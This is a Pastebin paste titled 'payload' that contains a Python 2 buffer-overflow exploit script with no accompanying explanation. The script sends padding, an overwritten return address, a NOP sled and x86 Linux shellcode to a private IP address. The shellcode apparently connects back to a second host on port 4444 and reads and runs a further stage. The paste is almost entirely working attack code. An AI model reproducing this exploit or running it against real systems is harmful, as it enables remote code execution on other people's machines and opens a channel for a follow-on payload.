Advertisement
chronomantic

payload

Dec 15th, 2019
969
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.26 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. import socket
  4. import struct
  5. import sys
  6.  
  7. if len(sys.argv) != 2:
  8.     print "Usage: " + sys.argv[0] + " [port]"
  9.     sys.exit(1)
  10.  
  11. DEST_IP = '192.168.100.77'
  12. DEST_PORT = int(sys.argv[1])
  13. payload =  ""
  14. payload += "\x6a\x0a\x5e\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02"
  15. payload += "\xb0\x66\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x64"
  16. payload += "\x50\x68\x02\x00\x11\x5c\x89\xe1\x6a\x66\x58\x50"
  17. payload += "\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0\x79\x19\x4e"
  18. payload += "\x74\x3d\x68\xa2\x00\x00\x00\x58\x6a\x00\x6a\x05"
  19. payload += "\x89\xe3\x31\xc9\xcd\x80\x85\xc0\x79\xbd\xeb\x27"
  20. payload += "\xb2\x07\xb9\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c"
  21. payload += "\xc1\xe3\x0c\xb0\x7d\xcd\x80\x85\xc0\x78\x10\x5b"
  22. payload += "\x89\xe1\x99\xb2\x6a\xb0\x03\xcd\x80\x85\xc0\x78"
  23. payload += "\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00"
  24. payload += "\x00\xcd\x80"
  25. junk = "A" * 1040
  26. ret =  "\x30\xcd\xff\xff"
  27. nops = "\x90" * 20
  28. EXPLOIT = junk + ret + nops + payload
  29. def convert(exploit):
  30.     raw = ''
  31.     raw += struct.pack("<I", len(exploit))
  32.     raw += exploit
  33.     return raw
  34.  
  35. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  36. s.connect((DEST_IP, DEST_PORT))
  37. s.send(convert(EXPLOIT))
  38.  
  39. data = s.recv(1024)
  40. s.close()
  41.  
  42. print "Received data: ", data
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement